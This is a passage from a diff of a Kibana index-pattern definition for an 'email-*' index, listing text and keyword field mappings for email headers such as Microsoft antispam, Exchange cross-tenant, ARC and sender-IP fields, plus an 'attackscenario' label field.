"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.2", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152841336, 1866], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searcha